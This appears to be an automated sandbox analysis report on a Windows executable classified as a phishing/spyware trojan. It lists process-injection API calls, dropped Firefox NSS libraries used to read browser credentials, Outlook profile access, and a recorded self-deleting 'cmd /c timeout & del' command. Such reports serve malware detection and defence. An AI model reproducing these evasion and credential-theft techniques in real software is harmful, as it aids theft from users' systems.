Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230A6D8 0_2_0230A6D8
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023063AE 0_2_023063AE
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300805 0_2_02300805
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023068AF 0_2_023068AF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023010C6 0_2_023010C6
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023065E5 0_2_023065E5
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300A18 0_2_02300A18
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230661A 0_2_0230661A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02301671 0_2_02301671
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230164B 0_2_0230164B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308EBC 0_2_02308EBC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02301682 0_2_02301682
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300A84 0_2_02300A84
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230328E 0_2_0230328E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300AF6 0_2_02300AF6
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300AE9 0_2_02300AE9
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02302EED 0_2_02302EED
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023036C0 0_2_023036C0
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023096CC 0_2_023096CC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023086CF 0_2_023086CF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02302333 0_2_02302333
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308F16 0_2_02308F16
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02306300 0_2_02306300
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230A706 0_2_0230A706
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305378 0_2_02305378
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02306B64 0_2_02306B64
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230175D 0_2_0230175D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300B5F 0_2_02300B5F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304787 0_2_02304787
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02306BDD 0_2_02306BDD
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300000 0_2_02300000
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02302003 0_2_02302003
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02302C09 0_2_02302C09
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230286C 0_2_0230286C
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02301050 0_2_02301050
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023058B2 0_2_023058B2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023050A2 0_2_023050A2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023030AB 0_2_023030AB
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023014AB 0_2_023014AB
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230589A 0_2_0230589A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230948E 0_2_0230948E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023010E7 0_2_023010E7
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023054DA 0_2_023054DA
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023044DE 0_2_023044DE
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304D35 0_2_02304D35
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230253A 0_2_0230253A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230593D 0_2_0230593D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02303519 0_2_02303519
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02309173 0_2_02309173
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230596A 0_2_0230596A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230195E 0_2_0230195E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304147 0_2_02304147
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304981 0_2_02304981
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02309D83 0_2_02309D83
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02301588 0_2_02301588
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023099FF 0_2_023099FF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023045E0 0_2_023045E0
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023009CF 0_2_023009CF
Contains functionality to call native functions
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308A39 NtWriteVirtualMemory,LoadLibraryA, 0_2_02308A39
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300805 EnumWindows,NtWriteVirtualMemory, 0_2_02300805
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023068AF NtWriteVirtualMemory,LoadLibraryA, 0_2_023068AF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230A1F4 NtProtectVirtualMemory, 0_2_0230A1F4
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023065E5 NtAllocateVirtualMemory, 0_2_023065E5
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230661A NtAllocateVirtualMemory, 0_2_0230661A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308EBC NtWriteVirtualMemory,LoadLibraryA, 0_2_02308EBC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305AF2 NtWriteVirtualMemory, 0_2_02305AF2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305B18 NtWriteVirtualMemory, 0_2_02305B18
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305378 NtWriteVirtualMemory, 0_2_02305378
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305BB4 NtWriteVirtualMemory, 0_2_02305BB4
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304787 NtWriteVirtualMemory, 0_2_02304787
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305B8E NtWriteVirtualMemory, 0_2_02305B8E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305BDB NtWriteVirtualMemory, 0_2_02305BDB
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305C2F NtWriteVirtualMemory, 0_2_02305C2F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305C7C NtWriteVirtualMemory, 0_2_02305C7C
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305C55 NtWriteVirtualMemory, 0_2_02305C55
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023058B2 NtWriteVirtualMemory, 0_2_023058B2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023050A2 NtWriteVirtualMemory, 0_2_023050A2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230589A NtWriteVirtualMemory, 0_2_0230589A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230948E NtWriteVirtualMemory, 0_2_0230948E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023054DA NtWriteVirtualMemory, 0_2_023054DA
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023044DE NtWriteVirtualMemory, 0_2_023044DE
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230253A NtWriteVirtualMemory, 0_2_0230253A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230593D NtWriteVirtualMemory, 0_2_0230593D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02303519 NtWriteVirtualMemory,LoadLibraryA, 0_2_02303519
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230596A NtWriteVirtualMemory, 0_2_0230596A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023045E0 NtWriteVirtualMemory, 0_2_023045E0
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: api-ms-win-core-string-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.17.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: X4lLneI8ZK.exe, 00000000.00000000.332931513.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameKuvertbrd.exe vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe Binary or memory string: OriginalFilename vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000003.912538712.000000001E7AC000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000000.613888707.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameKuvertbrd.exe vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe Binary or memory string: OriginalFilenameKuvertbrd.exe vs X4lLneI8ZK.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Section loaded: crtdll.dll Jump to behavior
PE / OLE file has an invalid certificate
Source: X4lLneI8ZK.exe Static PE information: invalid certificate
Source: X4lLneI8ZK.exe Virustotal: Detection: 38%
Source: X4lLneI8ZK.exe ReversingLabs: Detection: 35%
Source: X4lLneI8ZK.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\X4lLneI8ZK.exe 'C:\Users\user\Desktop\X4lLneI8ZK.exe'
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Users\user\Desktop\X4lLneI8ZK.exe 'C:\Users\user\Desktop\X4lLneI8ZK.exe'
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Users\user\Desktop\X4lLneI8ZK.exe 'C:\Users\user\Desktop\X4lLneI8ZK.exe' Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\~DFF37CB8E8E4CDE83D.TMP Jump to behavior
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@8/53@3/3
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: SELECT ALL id FROM %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_01
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A7A74107-99A69D1E-ADF8610F1
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp, mozglue.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.17.dr
Source: Binary string: ucrtbase.pdb source: X4lLneI8ZK.exe, ucrtbase.dll.17.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, freebl3.dll.17.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909646224.000000001F55C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.17.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, vcruntime140.dll.17.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914184884.000000001FF3C000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp, mozglue.dll.17.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, freebl3.dll.17.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910332025.000000001F558000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914184884.000000001FF3C000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.17.dr
